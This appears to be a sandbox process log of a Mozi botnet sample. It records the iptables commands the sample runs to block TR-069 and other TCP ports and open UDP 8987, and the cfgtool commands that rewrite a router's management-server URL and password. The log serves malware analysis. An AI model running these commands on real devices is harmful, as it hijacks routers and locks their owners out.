                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --dport 58000 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --dport 35000 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --dport 50023 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --dport 7547 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p udp --dport 8987 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p udp --dport 8987 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
